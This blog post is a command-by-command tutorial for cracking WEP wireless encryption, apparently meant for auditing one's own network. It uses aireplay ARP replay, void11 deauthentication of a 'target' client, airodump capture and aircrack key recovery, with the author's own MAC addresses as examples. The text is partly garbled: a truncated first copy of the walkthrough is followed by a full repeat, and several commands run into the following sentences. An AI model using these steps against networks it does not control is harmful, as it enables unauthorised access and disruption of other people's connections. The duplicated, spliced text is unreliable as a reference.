Since I can't find all of my instructions due to a crappy 16GB DataStickSport Thumbdrive crash, I heavily used this site for referencehttp://www.smallnetbuilder.com/content/view/24242/98/.
There are two ways of cracking WEP. The totally passive way, which is to just listen and gather enough weak IVs to crack the key (long and boring), or the active way, which requires two wireless cards (one to transmit traffic to generate the weak IVs, and the other to receive the weak IVs).
I'll walk through the active way, as the passive simply requires Aerodumping the packets with the Aerodump scripts below in one terminal, and Aircracking them with the Aircrack scripts below in a separate window (can be done at same time). I'm tailoring these scripts for the Security Auditor CD on two different boxes, as this is often more convienient than installing the tools on a production box, or dealing with fighting cards.
First, conduct a scan of your network: Kismet works wonders for this.
you should have written down the following four pieces of information:
Start up Aireplay to capture an ARP packet and replay it:
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
switch-to-hostap
cardctl eject
cardctl insert
iwconfig wlan0 channel THECHANNELNUM
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
Now you have one machine generating lots of traffic. Go to your other machine(or other card) to capture those packets and break them.
Start Aerodump to capture the network traffic:
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
airodump wlan0 cap1
After Aerodump starts, you should now see the IV count rise to about 200 per second,
Start Aircrack, and wait for your key to pop out:
cd /ramdisk
aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap
#My Netgear
#aircrack -f 2 -m 00:0c:41:f6:33:27 -n 128 -q 3 cap*.cap
There are two ways of cracking WEP. The totally passive way, which is to just listen and gather enough weak IVs to crack the key (long and boring), or the active way, which requires two wireless cards (one to transmit traffic to generate the weak IVs, and the other to receive the weak IVs).
I'll walk through the active way, as the passive simply requires Aerodumping the packets with the Aerodump scripts below in one terminal, and Aircracking them with the Aircrack scripts below in a separate window (can be done at same time). I'm tailoring these scripts for the Security Auditor CD on two different boxes, as this is often more convienient than installing the tools on a production box, or dealing with fighting cards.
First, conduct a scan of your network: Kismet works wonders for this.
you should have written down the following four pieces of information:
- MAC Address of the wireless Access Point (AP)
- MAC Address of the "Target" computer
- BSSID of the AP
- Wi-Fi channel used
Start up Aireplay to capture an ARP packet and replay it:
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff #my Netgear #aireplay -i wlan0 -b 00:09:5b:3e:39:96 -t 1 -f 0 -d ff:ff:ff:ff:ff:ffUse Void11 to knock off your client:
switch-to-hostap
cardctl eject
cardctl insert
iwconfig wlan0 channel THECHANNELNUM
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0 #void11_penetration -D -s 00:0f:3d:a9:0e:b4 -B 00:13:10:0e:e4:4b -m 50 wlan0Aireplay will prompt you to replay a packet. Replay the captured packet if it matches the following criteria:
- FromDS - 0
- ToDS - 1
- BSSID - MAC Address of the Target AP
- Source MAC - MAC Address of the Target computer
- Destination MAC - FF:FF:FF:FF:FF:FF
Now you have one machine generating lots of traffic. Go to your other machine(or other card) to capture those packets and break them.
Start Aerodump to capture the network traffic:
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
airodump wlan0 cap1
After Aerodump starts, you should now see the IV count rise to about 200 per second,
Start Aircrack, and wait for your key to pop out:
cd /ramdisk
aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap
#My Netgear
#aircrack -f 2 -m 00:0c:41:f6:33:27 -n 128 -q 3 cap*.cap
Comments
Post a Comment